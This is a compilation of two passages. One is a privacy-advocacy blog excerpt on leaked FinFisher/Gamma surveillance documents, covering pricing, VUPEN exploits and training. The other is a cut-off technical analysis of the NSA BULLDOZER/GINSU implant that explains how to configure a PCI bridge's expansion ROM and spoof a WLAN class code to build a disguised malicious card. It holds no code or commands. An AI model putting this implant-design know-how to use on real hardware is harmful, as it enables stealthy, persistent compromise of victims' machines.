billion annually, and growing by 20% every year. By the end of 2014, ISS World trade fairs (the so-called 'Wiretappers Ball') will have held trade fairs in Washington DC, Prague, Brasilia, Johannesburg, Dubai and Kuala Lumpur, reflecting how the industry has stretched its tentacles to all corners of the world, selling to essentially any and all governments who deem their tools 'necessary'. The Gamma documents show their own attendance at multiple exhibitions, extending beyond ISS World and into specialised security and defence exhibitions, including the "Security and Policing" fair in Farnborough, UK, the "LAAD Defence and Security Expo" in Rio, and "FBI Executives Training" in San Antonio, Texas amongst others. What is noticeable is not merely the provision of software and hardware, a lot of which was already known to those active in the area, but the sense of the industry becoming 'established' and attempting to operate like any other normal international business. The latest Gamma brochures and presentations show the slicker side of the company and can be taken as representative of the modern industry, a highly professionalised sector with PR and marketing language directed at law enforcement and government agencies, presenting surveillance products as the comprehensive solution to any tricky problem. Paying attention to 'the little things' are a sign of a well-established and professional sector, and Gamma displays this in one of their trade fair attendance spreadsheets detailing which member of staff was due to send follow-up emails to interested individuals afterwards. 4. They do more than just sell We've previously shown how surveillance companies do not only sell the products found in these brochures. Beyond developing and marketing, companies like Gamma provide an extensive consulting service, helping install the equipment, get surveillance teams up and running, and lend IT support for any technical problems the software encounters. The provision of services beyond merely supplying the initial software or hardware is strikingly illuminated by these new documents, showing first-hand evidence at the technical and customer support offered to clients. Specifically, the new documents say that the products are subject to regular updates due to technical advances in the products, "therefore an annual support contract is required to received such upgrades and updates" [FF License Renewal Template 23.01.14]. Similarly, in the leaked pricelist, line entries show charges for post-sales support and update licences for up to 5 years, showing a consistent support mechanism for the client. The training documents detail the depth of the training given by Gamma employees to their government clients. For example in the FinIntrusion Kit 2.2, clients are trained how to conduct network intrusion, how to search and identify victims, break WEP and WPA encryption, jam wireless networks, and extract usernames and passwords for everyday services like Gmail, Hotmail, and Facebook. When it comes to training governments on how to use their malware, the Gamma documents show how quickly they can get authorities up and running on how to use the surveillance equipment: a basic intrusion course would take five days, while an extended course would need 10 days. 5. Relationships with other companies The symbiotic relationships between the leading firms have long suspected, and small elements of this collusion have been revealed previously. Gamma International has been shown to have worked hand-in-glove with two Swiss companies, Dreamlab and Elaman, supplying surveillance equipment to regimes such as Turkmenistan. These new Gamma documents have confirmed this is an established business partnership, revealing the role of both Swiss-based companies in reselling Gamma's products, and training clients in the field. Other documents have shown that the new FinFisher company and Elaman even have the same address. The training price-lists show the cooperation between these three distinct companies. If a government purchases a Gamma product from Elaman, they would receive a discount of 25% for software and support, while a discount of 15% is on offer for hardware and training, according to the pricelist. A slightly less generous discount of 20% and 10% is on offer for other agents and resellers, demonstrating the widespread partnerships throughout the industry. Alongside the training services offered by Gamma, it's noticeable they advertise the capabilities of the trainers from Dreamlab - who clearly come highly recommended for their knowledge of infrastructure as they command five times the salary as a Gamma staff member for in-country training. Through an examination of the line-by-line price-list, we see a window into the range and cost of services on offer. The breakdown shows wholly customisable services for the client - activation licences for FinSpy Mobile targeting Blackberry, Windows Mobile, iPhone, Symbian and Android; licences for After Sales Support and Updates for up to 3 years; User Manuals; Desktop workstations; specific laptops; as well as a critical evolution in the industry - access to the 'Exploit Portal' of French vulnerability developer, VUPEN. We've highlighted in the past Gamma's role in pushing 0-day exploits, and VUPEN's role in this market. Ties between VUPEN and Gamma/Finfisher have long been public and friendly, but the pricelist and documents confirm a business relationship between governments, Gamma, and the use of VUPEN's large database of exploits. In this transaction, VUPEN sell exploits to be used in the FinSpy exploit portal, which then Gamma/FinFisher turn around and sell to their customers. A Frequently Asked Questions document within the Gamma documents shows that the company, when selling exploits, apparently is often asked where the vulnerabilities come from. "Q: Can we name the supplier? A: Yes you can mention that we work with VUPEN here." We can now compare two pricelists from Gamma, the 2011 and new release. In 2011, a FinSpy Relay, Master, and Generation Licence for between one and 10 targets, cost a government €100,000. Yet we see a whopping 20% increase by the end of 2013 with the same service now costing €120,000. The FinSpy PC Activation licence covered Windows, and OSX at a cost of €1,950, but by 2013 this increased to €2,340 and the inclusion of licences for Linux. 6. The technology has evolved FinFisher, which takes complete control over a target's device once infected, came to international prominence in 2011 when documents uncovered in the aftermath of the Arab Spring showed its use by the Egyptian security services. The same year saw Wikileaks' SpyFiles 2 release showing various documents including training videos for Gamma's products i.e. FinSpy Mobile, FinUSB, and FinFly. Subsequent publications of brochures in SpyFiles 3 and our own Surveillance Industry Index continued to document what the company is selling. Gamma themselves describe their prospective clients as ranging from intelligence agencies, air force, navy and army groups, Customs departments and Presidential Guards. This sophisticated clientele would demand cutting edge solutions and technology that is consistently evolving and progressing. The Gamma documents show this evolution, through constant communication with their clients of forthcoming enhancements and versions with better capabilities. The presentations and training documents show the progression of intrusion techniques, pushing past 'traditional passive monitoring' for problems 'that can only be solved by adding IT intrusion solutions'. Gamma themselves highlight the 'global mobility of devices and targets' as a problem that needs to be 'solved', as well as anonymity through the use of hotspots, proxies, and webmail - as well as referencing Tor. The provision of 'roadmaps' show clients when updates for their purchases will be available, and detail the features of the new versions. For example, these roadmaps reveal new versions and enhancements of their invasive FinSpy Mobile. Version 4.4, released in of Q4 2012, has the ability to collect data through Skype across iOS, Blackberry, Android, and Windows Mobile platforms . An updated Version 4.5, released in Q1 2013, included the ability to target emails, calendars and keylogging of Windows Phones, and an updated ability to collect data through the camera of a Blackberry or iOS phone. It is important to add that more analysis will be needed to fully piece together and chart the progress of Gamma intrusion software. As we continue to analysis these documents, we will publish more information. Sursa: https://www.privacyinternational.org/blog/six-things-we-know-from-the-latest-finfisher-documents
  6. This article is the second part of a series on NSA BIOS Backdoor internals. This part focuses on BULLDOZER, a hardware implant acting as malware dropper and wireless communication “hub” for NSA covert operations. Despite that BULLDOZER is a hardware, I still use the word “malware” when referring to it because it’s a malicious hardware. Perhaps the term “malware” should refer to both malicious software and malicious hardware, instead of referring only to the former. I’d like to point out why the BULLDOZER is classified as “god mode” malware. Contrary to DEITYBOUNCE, BULLDOZER is not a name in the realms of “gods”. However, BULLDOZER provides capabilities similar to “god mode” cheat in video games—which make the player using it close to being invincible—to its payload, GINSU. Therefore, it’s still suitable to be called god mode malware. The presence of BULLDOZER is very hard to detect, even with the most sophisticated anti malware tool during its possible deployment timeframe. As for GINSU, we will look into GINSU in detail in the next installment of this series. The NSA ANT Server document—leaked by Edward Snowden—describes BULLDOZER briefly. This article presents an analysis on BULLDOZER based on technical implications of the information provided by the NSA document. Despite lacking in many technical details, we could still draw a technically-sound analysis on BULLDOZER based on BIOS and hardware technology on the day BULLDOZER became operational, just like in the DEITYBOUNCE case. Introduction to GINSU-BULLDOZER Malware Combo BULLDOZER doesn’t work in isolation. It has to be paired with the GINSU malware to be able to work. As you will see in the next installment of this article, GINSU is a malicious PCI expansion ROM. Therefore, at this point, let’s just assume that GINSU is indeed a malicious PCI expansion ROM and BULLDOZER is the hardware where GINSU runs. This means BULLDOZER is a PCI add-in card, which is in line with the information in the NSA ANT server document. Before we proceed to analyze BULLDOZER, let’s look at the context where BULLDOZER and GINSU work. GINSU and BULLDOZER are a software and hardware combo that must be present at the same time to work. We need to look at the context where GINSU and BULLDOZER operate in order to understand their inner working. Figure 1 shows the deployment of GINSU and BULLDOZER in the target network. Figure 1 GINSU Extended Concept of Operations. Courtesy: NSA ANT Product Data Figure 1 shows BULLDOZER hardware implanted in one of the machines in the target network. The NSA Remote Operation Center (ROC) communicates via OMNIGAT with the exploited machine through an unspecified wireless network. This implies the GINSU-BULLDOZER malware combo targets machines in air-gapped networks or machines located in a network that is hard—but not impossible—to penetrate. In the latter case, using machines with malware-implanted hardware is more economical and/or stealthier compared to using an “ordinary” computer network intrusion approach. Let’s look closer at the technical information revealed by the NSA ANT product data document, before we proceed to deeper technical analysis. The NSA ANT server product data document mentions: GINSU provides software application persistence for the Computer Network Exploitation (CNE) implant—codenamed KONGUR—on systems with the PCI bus hardware implant, BULLDOZER. The technique supports any desktop PC system that contains at least one PCI connector (slot) and uses Microsoft Windows 9x, 2000, 2003 server, XP, or Vista. The PCI slot is required for the BULLDOZER hardware implant installation. BULLDOZER is installed in the target system as a PCI hardware implant through “interdiction”—fancy words for installing additional hardware in the target system while being shipped to its destination. After fielding, if KONGUR is removed from the system as a result of operating system upgrade or reinstallation, GINSU can be set to trigger on the next reboot of the system to restore the software implant. It’s clear that there are three different components in the GINSU-BULLDOZER combo from the four points of information above and from Figure 1. They are as follows: The first component is GINSU. The GINSU code name is actually rather funny because it refers to a knife that was very popular in 1980s and 1990s via direct sell marketing. Perhaps the creator of the GINSU malware refers to the Ginsu knife’s above average capability to cut through various materials. GINSU is possibly a malicious PCI expansion ROM—PCI expansion ROM is also called PCI option ROM in many PCI-related specifications; I will use both terms in this article. GINSU might share some modules with DEITYBOUNCE because both are a malicious PCI expansion ROM—see the DEITYBOUNCE analysis at NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute. However, it differs in many other aspects. First, GINSU runs on the NSA custom PCI add-in card, codenamed BULLDOZER. Therefore, GINSU could be much larger in size compared to DEITYBOUNCE because NSA controls the size of the flash ROM on the PCI add-in card. This means GINSU could incorporate a lot more functions compared to DEITYBOUNCE. Second is the type of PCI add-in card type that GINSU might use. From Figure 1, GINSU hardware (BULLDOZER) seems to masquerade as a WLAN PCI add-in card or other kinds of PCI add-in cards for wireless communication. This implies the PCI class code for the BULLDOZER hardware that contains GINSU probably is not a PCI mass storage controller like the one used by DEITYBOUNCE. Instead, the BULLDOZER PCI chip very possibly uses a PCI wireless controller class code. The second component is named BULLDOZER. This codename perhaps refers to the capability of BULLDOZER to push large quantities of materials to their intended place, which in the context of GINSU provides the capability to push the final payload (KONGUR) to the target systems. In this particular malware context, BULLDOZER refers to the PCI add-in card (hardware) implant installed in the target machine. BULLDOZER is a custom PCI add-in card. It very probably masquerades as a PCI WLAN add-in card because it provides a wireless communication function that requires a certain kind of antenna. However, this doesn’t prevent BULLDOZER from masquerading as another kind of PCI add-in card, but the presence of a physically larger antenna in the PCI WLAN card could boost the wireless signal strength. Therefore, the NSA might use the PCI WLAN card form factor to their advantage. We will look deeper into BULLDOZER implementation later. The third (last) component is named KONGUR. KONGUR is a bit mysterious name. It may refer to Kongur Tagh Mountain in China’s Xinjiang-Uyghur Autonomous Region. This could possibly means that the GINSU-BULLDOZER combo was devised for a campaign to infiltrate Chinese computer systems. After all, the Xinjiang-Uyghur Autonomous Region is famous for its people’s rebellion against the Chinese central government. This doesn’t mean that the GINSU-BULLDOZER combo wasn’t used against other targets in other campaigns though. KONGUR is a Windows malware that targets Windows 9x, 2000, XP, Server 2003 and Vista. GINSU provides the delivery and reinstallation mechanism for KONGUR. We can view KONGUR as the payload of the GINSU-BULLDOZER combo. It’s possible that KONGUR could also work in Windows Vista derivatives, such as Windows 7 and Windows Server 2008, or even later Microsoft operating system (OS), such as Windows 8, Server 2012, and 8.1 because KONGUR also targets Windows Vista, and we don’t know which 0-day exploit it uses and whether the 0-day exploit has already been patched or not. This article doesn’t delve deep into KONGUR and GINSU; the focus is on its hardware delivery mechanism, the BULLDOZER malware. The GINSU-BULLDOZER malware combo is the second NSA BIOS malware that we looked into that “abuses” the PCI expansion ROM—after DEITYBOUNCE. Well, we could say that the NSA is quite fond of this technique. Though, as you will see later, it’s a justified fondness. Anyway, this hypothesis on the GINSU-BULDOZER combo is bound to have subtle inaccuracies because I have no sample of the malware combo to back-up my assertions. I’m very open to constructive criticism in this regard. Now, we are going to look into BULLDOZER technical details. However, if you’re not yet familiar with the PCI bus protocol, please read the first part of this series (NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute). There are links in that article that further break down the required prerequisite knowledge, just in case you’re not up to speed yet. BULLDOZER: NSA Malicious PCI Add-In Card In this section we delve into details of the procedures that the NSA probably carries out to create the BULLDOZER hardware implant. Surely, the exact type of hardware used by the NSA may very well be different. However, I try to draw the closest analogy possible from the public domain knowledge base. Despite the NSA’s superiority compared to the private sectors, all of us are bound to the laws of physics and must adhere to hardware protocol in the target systems. Therefore, the NSA’s approach to build BULLDOZER couldn’t be that much different than the explanation in this article. In the BULLDOZER Implementation Recap section, I try to draw the most logical hypotheses on the BULLDOZER hardware implant, based on the explanation of the process in designing and creating a PCI add-in card similar to BULLDOZER. PCI add-in cards are installed on PCI expansion slots on the motherboard. Figure 2 shows a PCI add-in card sample. This PCI add-in card is a PCI WLAN card. Figure 2 highlights the PCI “controller” chip from Ralink—a WLAN controller—and the PCI slot connector in the add-in card. The term “controller” is a generic name given to a chip that implements the core function in a PCI add-in card. PCI hardware development documentation typically uses this term, as do PCI-related specifications. Figure 2 PCI add-in card sample. Courtesy: D-Link. I use a PCI WLAN card as an example because the GINSU extended concept of operation implies that the BULLDOZER hardware implant is a PCI wireless controller card. As to what kind of wireless protocol it uses, we don’t know. But, the point is, BULLDOZER could masquerade as a PCI WLAN card for maximum stealth. It would look innocuous that way. Figure 2 doesn’t show the presence of any flash ROM in the PCI add-in card. The PCI add-in card typically stores the PCI option ROM code in the flash ROM. The purpose of Figure 2 is just to show you the typical appearance of the PCI add-in card for wireless communications. We’ll get into the flash ROM stuff later on. PCI Add-In Card in OEM Desktop PC Circa 2008 Now, let’s look at how a typical 2008 desktop PC could be implanted with such a card. One of the desktop PCs from a system builder that still had a PCI slot(s) in 2008 is the Lenovo ThinkCentre M57 Desktop PC. I chose a Lenovo desktop PC as an example because its products were widely used in China—besides other parts of the world. It could probably be one of the victims of the GINSU-BULLDOZER campaign. Who knows? The Lenovo ThinkCentre M57 has two PCI slots. Let’s say NSA “interdicts” such a system. They can install BULLDOZER in it and then replace the user guide as well to make the BULLDOZER implant look like a legitimate PCI add-in card that comes with the PC, just in case the user checks the manual before using the system. Figure 3 Lenovo ThinkCentre M57 PCI Add-In Card Replacement Instructions (edited version of the original ThinkCentre Hardware Maintenance Manual instructions). Courtesy: Lenovo. The Lenovo ThinkCentre Hardware Maintenance Manual even comes with instructions to replace a failed PCI add-in card. Figure 3 shows the instruction to replace a PCI add-in card in an “exploded view” style. Hardware replacement instructions shown in Figure 3 are a pedestrian task to do; any NSA field agent can do that. PCI Wireless Communication Add-In Card Hardware and Software Co-Development Now, let’s look at the steps to develop a PCI wireless communication add-in card in general, because we presume that BULLDOZER falls within this PCI add-in card category. I’m quite sure the NSA also follows the approach explained here, despite being a very advanced spying agency. Only the tools and hardware it uses are probably different—perhaps custom-made. From a cost point of view, using a Commercial Off-The-Shelf (COTS) approach in creating BULLDOZER hardware would be more cost-effective, i.e. using tools already in the market cost much less than custom tools. COTS benefited from economic of scale and competition in the market compared to custom tools. Moreover, from operational standpoint, the GINSU-BULLDOZER target systems would likely evolve after five years, which dictates the use of new tools. Therefore, obsolescence, which usually plagues COTS solutions, is not a problem in the GINSU-BULLDOZER campaign. The latter fact strengthened my suspicion that the NSA very probably uses the COTS approach. We’ll look at this COTS approach shortly. The “crude” steps to develop a PCI add-in card and its assorted software in general—via the COTS approach—are as follows: High-level design. This step involves the high-level decision on what kind of PCI controller chip would be created for the PCI add-in card and what features the chip would implement and what auxiliary support chip(s) are required. For example, in the case of a PCI wireless communication add-in card, typically you will need a separate Digital Signal Processor (DSP) chip, or you need to buy the DSP logic design from a DSP vendor and incorporate that design into your PCI Field Programmable Gate-Array (FPGA). Hardware prototyping. This step involves creating the PCI controller chip prototype with a PCI FPGA development board. Typically, the language used to develop the PCI controller chip in the FPGA is either VHDL or Verilog. This mostly depends on the FPGA vendor. Software (device driver) development. This step involves creating a prototype device driver for the PCI add-in card for the target Operating System (OS). For example, if the device would be marketed for mostly Windows users, then creating a Windows device driver would take priority. As for other target OS, it would be developed later or probably not at all if market demands on the alternative OS don’t justify the cost involved in developing the driver. This step is typically carried-out in parallel to hardware prototyping once the first iteration of the FPGA version of the chip is available. Some FPGA vendors provide a “template” driver for certain target OS to help with the driver development. This way, the PCI controller chip development can run in parallel with the chip design. There are also third-party “driver template” vendors which are endorsed by the FPGA vendors, such as Jungo Windriver—see http://www.jungo.com/st/products/windriver/. Chip fabrication, also known as the making of the Application Specific Integrated Circuit (ASIC). In this step, the first design revision of the chip is finished and the design is sent to chip fabrication plant for fabrication, such as TSMC, UMC or other contract semiconductor fab. This is an optional step though, because some low-volume PCI add-in cards these days are made out of FPGA anyway. If the cost of chip fabrication doesn’t make economic sense against creating the product out of FPGA, then the final product uses FPGA anyway. Well, the NSA has several semiconductor fabs—for example, see NSA plant in San Antonio shrouded in secrecy - Houston Chronicle. One of the NSA’s fab probably was used to fabricate BULLDOZER PCI controller chip. Compatibility test on the PCI hardware-software “combo”. The chip vendor carries out the compatibility testing first. If the target OS is Windows, Microsoft also carries out additional compatibility testing. In the Windows platform, there is this so-called “WHQL” testing. WHQL stands for Windows Hardware Quality Labs. Windows Hardware Quality Labs testing or WHQL Testing is Microsoft’s testing process which involves running a series of tests on third-party hardware or software, and then submitting the log files from these tests to Microsoft for review. In case the primary target OS is not Windows, only the test from the hardware vendor is carried out. The NSA very probably also carries out this kind of test, but for an entirely different purpose, i.e. to make sure the driver works as stealthily as possible or to mislead the user to think the driver is just an ordinary PCI device driver. Steps 2 and 3 are actually iterative steps. The PCI hardware prototype goes through several iterations until it matures and is ready for fabrication. Step 4 could also happen as an iterative step, i.e. there are several revisions of the chip. The first revision might have a flaw or performance weakness that must be improved, despite being a functional design. In the commercial world, ASICs typically have several revisions. Each revision is marked as a “stepping”. You would find the word “stepping” mentioned in many CPU, chipset or System-on-Chip (SoC) technical documentation. “Simulating” BULLDOZER Hardware Now, let’s look into the process of developing a specific PCI add-in card, i.e. a PCI add-in card with wireless communication as its primary function. We focus on this kind of PCI add-in card because BULLDOZER connects to the outside world—to OMNIGAT in Figure 1—via an unspecified wireless connection. For this purpose, we look into the hardware prototyping step in more detail. Let’s start with some important design decisions in order to emulate BULLDOZER capabilities, as follows: The prototype must have the required hardware to develop a custom wireless communication protocol. The reason is because the wireless communication protocol used by BULLDOZER to communicate with OMNIGAT must be as stealthy as possible, despite probably using the same physical antenna as a PCI WLAN card. The prototype must have an implemented PCI expansion ROM hardware. The reason is because GINSU is a malicious PCI expansion ROM code that must be stored in a functional PCI expansion ROM chip to work. GINSU is configurable, or at the very least it can be optionally triggered—based on the NSA ANT server document. This means there must be some sort of non-volatile memory in the prototype to store GINSU parameters. It could be in the form of a Non-Volatile RAM (NVRAM) chip, like in the DEITYBOUNCE case. Storing the configuration data in a flash ROM or other kinds of ROM is quite unlikely, given the nature of flash ROM which requires a rather complicated procedure to rewrite. The next step is to choose the prototyping kit for the hardware. There are many PCI FPGA prototyping board in the market. We will look into one of them from Sundance (DSP and FPGA Solutions - Sundance Multiprocessor Technology Ltd.). Sundance is probably a very obscure vendor to you. However, this vendor is one of the vendors that provide a PCI development board for a Software-Defined Radio (SDR) application. You might be asking, why would I pick a PCI SDR development board as an example? The reason is simple, because SDR is the best approach when you want to develop your own wireless protocol. You can tune the frequency, the type of modulation, transmitter power profile, and other parameters needed to make the protocol as stealthy as possible. BULLDOZER Hardware “Simulation” with Sundance SMT8096 SDR Development Kit There are usually more than one FPGA in a typical PCI SDR development board. We are going to look into one of Sundance products which were available in the market before 2008—the year the GINSU-BULLDOZER malware combo was operational. I picked Sundance SMT8096 SDR development kit as the example in this article. This kit was available in the market circa 2005. The kit consists of several connected boards with a “PCI carrier” board acting as the host of all of the connected boards. The PCI carrier board connects the entire kit to the PCI slot in the development PC. Figure 4 shows the entire Sundance SMT8096 SDR development kit hardware. Figure 4 Sundance SMT8096 SDR development kit. Courtesy: Sundance Multiprocessor Technology Ltd. Figure 4 shows the components of the Sundance SMT8096 SDR development kit. As you can see, the development kit consists of several circuit boards as follows: SMT395-VP30 board, which contains the Texas Instrument TI DSP C6416T chip and the Xilinx Virtex II Pro FPGA. The TI DSP C6416T chip provides the primary signal processing in the development kit, while the Virtex II FPGA provides the reconfigurable signal processing part. Actually, it’s the FPGA in this board that provides the term “software” in the “software-defined” part of the SDR abbreviation. The SMT350 board provides the Analog-to-Digital Converter (ADC) / Digital-to-Analog Converter (DAC) functions. This board provides two functions. First, it receives the analog input from the input antenna and then converts that input into its equivalent digital representation before feeding the result to the signal processing board. Second, it receives the digital output of the signal processing board and converts that digital signal into an analog signal to be fed into the output antenna. The input and output antenna could be the same or different, depending on the overall design of the SDR solution. The SMT368 board provides yet another FPGA, a Xilinx Virtex 4 SX35 FPGA. This board provides “protocol/data-format” conversion function as you can see in Figure 5 (Sundance SMT8096 SDR development kit block diagram). SMT310Q is the PCI carrier board. It’s this board that connects to the host (desktop PC) motherboard via the PCI connector. This board provides the PCI logical and physical interface into the host PC. Figure 5 shows the block diagram of the entire SDR development kit. It helps to understand interactions between the SDR development kit components. Figure 5 Sundance SMT8096 Development Kit Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Let’s look into SMT310Q PCI carrier board, because this board is the visible one from the motherboard BIOS perspective. We’ll focus on the technology required to communicate with the host PC instead of the technology required for the wireless communication, because we have no further clues on the latter. Moreover, I’m not an expert in radio communication technology in anyway. The SMT310Q PCI carrier board has a QuickLogic V363EPC PCI bridge chip, which conforms to PCI 2.1 specifications. This chip was developed by V3 Semiconductor, before the company was bought by QuickLogic. The V363EPC PCI Bridge connects the devices on the SMT8096 development kit to the host PC motherboard—both logically and electrically—via the PCI slot connector. This PCI bridge chip is not a PCI-to-PCI bridge, rather it’s a bridge between the custom bus used in the SMT8096 development kit and the PCI bus in the host PC. The correct term is Local Bus to PCI Bridge. Local bus in this context refers to the custom bus in the SMT8096 development kit—used for communication between the chips in the development kit boards. At this point we have made the important design decisions, we have picked the PCI hardware development kit to work with, and we have looked into the PCI-specific chip in the development kit. It’s time to get into details of the design implementation. The steps to implement the design are as follows: Assuming the wireless communication protocol has been defined thoroughly, the first step is to implement the protocol in the form of DSP chip firmware code and FPGA designs. The DSP chip firmware code consists of initialization code required to initialize the DSP chip itself, code to initialize the interconnection between the DSP chip and the Local Bus to PCI Bridge via the Local Bus interface, and code for other auxiliary functions. Assuming we use the Sundance SMT8096 kit, this step consists of creating the firmware code for the Texas Instrument TIC6416T DSP chip and creating the FPGA designs for the Xilinx Virtex-II and Xilinx Virtex-4 SX35. We are not going to delve into the details of this step, as we don’t know the specifics of the wireless communication protocol. The second step is to customize the hardware to support the PCI expansion ROM. This is required because we assume the GINSU malware is a malicious PCI expansion ROM code. In this step we configure the SMT310Q carrier board to support the PCI expansion ROM because this board is the one that interfaces with the host (x86/x64 desktop) PCI bus, both at the logical and physical level. We have to enable the Expansion ROM Base Address Register (XROMBAR) in the QuickLogic V363EPC PCI bridge chip (Local Bus to PCI Bridge) in the SMT310Q carrier board via hardware configuration, and we have to provide a flash ROM chip to store the PCI expansion ROM code on the board as well. If you’re not familiar with XROMBAR, refer to my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) for the details. Now, let’s focus on the last step: customizing the hardware required for the PCI expansion ROM to work. It’s the SMT310Q carrier board that implements the PCI bus protocol support in SMT8096 PCI SDR development kit. Therefore, we are going to scrutinize the SMT310Q carrier board to find out how we can implement the PCI expansion ROM on it. We start with the board block diagram. Figure 6 shows the SMT310Q block diagram. The block diagram is not a physical block diagram of the board. Instead, it’s a logical block diagram depicting logical interconnections between the board components. Figure 6 SMT310Q Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Figure 6 shows blocks marked as TIM, i.e. TIM 1, TIM 2 and so on. TIM is an abbreviation for Texas Instrument Modules. TIM is a standard interconnection between boards using a Texas Instrument DSP chip and other board(s). I couldn’t find the latest version of TIM specifications. However, you can find TIM version 1.01 on the net. Despite that TIM implies that a DSP that should be connected via this interconnect, in reality, anything that conforms to the specifications can be connected. It’s important to know about TIM, because we are going to use it to “wire” the PCI expansion ROM and also to “wire” NVRAM into the SMT310Q carrier board later. Figure 6 shows that the QuickLogic V363EPC PCI bridge—marked as V3 PCI Bridge—connects to the TIMs via the 32-bit Global Bus. The 32-bit Global Bus corresponds to the LAD[31:0] multiplexed address and data lines in the QuickLogic V363EPC datasheet. This means the logical and physical connection from QuickLogic V363EPC to the PCI expansion ROM and the NVRAM in our design will be based on the Global Bus. Now, let’s look at how QuickLogic V363EPC exposes devices wired to the TIMs into the host x86/x64 CPU address space. QuickLogic V363EPC uses the so-called “data transfer apertures” to map devices connected through LAD[31:0] into the host x86/x64 CPU address space. These apertures are basically an address range claimed by the PCI Base Address Registers (BARs) in QuickLogic V363EPC. QuickLogic V363EPC datasheet uses different naming scheme for PCI BARs. Figure 7 shows the PCI BARs marked as PCI_BASEx registers. The PCI_MAPx registers in Figure 7 control the amount of memory or I/O range claimed by the PCI_BASEx registers. If you are new to PCI configuration space registers, my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) has a deeper explanation on the subject. You can compare the “standard” PCI configuration space registers explained there and the ones shown in Figure 7. Figure 7 QuickLogic V363EPC PCI configuration registers. Courtesy: QuickLogic V363EPC datasheet. Let’s look deeper into the “data transfer aperture” in QuickLogic V363EPC. The “aperture” is basically address remapping logic, i.e. it remaps addresses from the host x86/x64 CPU address space into the local address space in the SMT310Q PCI add-in board. If you’re new to address remapping, you can read a sample of the concept in System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute. Figure 8 shows simplified block diagram of the QuickLogic V363EPC aperture logic (address remapper). Figure 8 QuickLogic V363EPC Aperture Logic Figure 8 shows QuickLogic V363EPC claims two different ranges in the PCI address space of the host x86/x64 CPU address space. We are only going to delve into the first range claimed by the PCI_BASE0 register. This is the relevant excerpt from QuickLogic V363EPC datasheet: “4.1.8 Special Function Modes for PCI-to-Local Bus Apertures PCI-to-Local bus aperture 0 shares some functionality with the expansion ROM base aperture. The address decoder for PCI-to-Local aperture 0 is shared with the expansion ROM base register. When the expansion ROM base is enabled, the decoder will only bridge accesses within the ROM window. When the ROM is disabled, PCI-to-Local bus aperture 0 will function as described above. Typically, the expansion ROM is used only during BIOS boot, if at all. The expansion ROM base register can be completely disabled via software.” The excerpt above clarifies the PCI expansion ROM mapping. Basically, it says that when the PCI expansion ROM chip mapping is enabled via the XROMBAR register, the aperture will be used only for access to the PCI expansion ROM chip. No other chip can claim the transaction via the aperture. XROMBAR in QuickLogic V363EPC chip must be enabled in order to support PCI expansion ROM. This is quite a complicated task. We must find the default XROMBAR register value in the chip. The XROMBAR is named PCI_ROM register in QuickLogic V363EPC datasheet, as you can see in Figure 7. QuickLogic V363EPC datasheet mentions that PCI_ROM (XROMBAR) default value upon power-on is 00h. This means the XROMBAR is disabled because its least significant bit is zero—per PCI specification. However, this is not a problem as the default values of the PCI configuration space registers in QuickLogic V363EPC PCI bridge can be made configurable. There are hardware “straps” that control the default values of the PCI configuration space registers in QuickLogic V363EPC. One of the “straps’” configuration instructs QuickLogic V363EPC to “download” its PCI configuration space registers default values from an external serial EEPROM chip. Pay attention to the fact that this serial EEPROM chip is an entirely different chip from the PCI expansion ROM chip. Figure 9 shows the “straps” option for V363EPC PCI configuration space registers. Figure 9 QuickLogic V363EPC PCI Configuration Space Registers Default Values Initialization “straps” Option. Courtesy: QuickLogic V363EPC datasheet. Figure 9 shows there are two “straps” that control the default value initialization in V363EPC, i.e. SDA and SCL. Both of these “straps” are actually pins on the V363EPC chip. As you can see, when SDA and SCL are connected to serial EEPROM, the PCI configuration space registers default values will be initialized from serial EEPROM. The SDA and SCL pins adhere to I2C protocol. I2C is a serial protocol to connect microcontroller and other peripheral chips in a cost efficient manner, i.e. in as small a number of pins as possible, because pins and traces on a circuit board are costly to design and manufacture. SDA stands for Serial Data and SCL stands for Serial Clock, respectively. Figure 10 V363EPC to serial EEPROM connection circuit schematic. Courtesy: QuickLogic V363EPC datasheet. Figure 10 shows the circuit schematic to implement loading default PCI configuration space registers from EEPROM. Now we know how to “force” V3636EPC PCI configuration space registers default values to our liking. Once the pull-up resistors are set up to configure QuickLogic V363EPC to use serial EEPROM, the QuickLogic V363EPC PCI configuration space registers default values are stored in serial EEPROM and automatically loaded to QuickLogic V363EPC PCI configuration space after power-on or PCI bus reset, prior to PCI bus initialization by the motherboard BIOS. This means we can configure the XROMBAR default value via contents of the serial EEPROM. Therefore, the PCI_ROM (XROMBAR) can be enabled. Another PCI configuration register to take into account is the PCI_MAP0 register. The PCI_MAP0 register—highlighted in red box in Figure 7—controls whether the PCI_ROM register is enabled or not. It also controls size of the ROM chip to be exposed through the PCI_ROM register. Let’s look into details of the PCI_MAP0 register. Figure 11 shows the relevant excerpt for PCI_MAP0 register from QuickLogic V363EPC datasheet. Figure 11 PCI_MAP0 register description. Courtesy: QuickLogic V363EPC datasheet Figure 11 shows the ROM_SIZE bits in PCI_MAP0 register highlighted in yellow. The bits determine size of the PCI expansion ROM to be decoded by QuickLogic V363EPC. As you can see, the chip supports a PCI expansion ROM with size up to 64KB. Perhaps this size is not up to what a malicious PCI expansion ROM payload requires. However, a malicious PCI expansion ROM code can load additional code from other memory storage in the PCI add-in card when the ROM code executes. You must configure the ROM_SIZE bits default value to the correct value according to your hardware design. Entries in Figure 11 that have their “type” column marked as FRW means the default value of the bits are determined by the contents of the serial EEPROM if serial EEPROM support is activated via SDA and SCL “straps”. Therefore, all you need to do is place the correct value in the serial EEPROM to configure their default values. There is one more PCI configuration space register to take into account to implement BULLDOZER hardware, the Class Code register. The PCI Class Code register consists of three sub-parts: the base class, sub-class and interface. Figure 12 shows the class code selections for PCI Wireless Controller class of devices. Figure 12 PCI Wireless Controller Class Code As you see in Figure 12, we have to set the class code in our BULLDOZER chip design to base class 0Dh, sub-class 21h and interface 00h to make it masquerade as a PCI WLAN chipset that conforms to WLAN protocol revision B. Figure 7 shows the location of the Class Code register in the QuickLogic V363EPC chip. All you need to do is to store the correct class code in the serial EEPROM used to initialize contents of QuickLogic 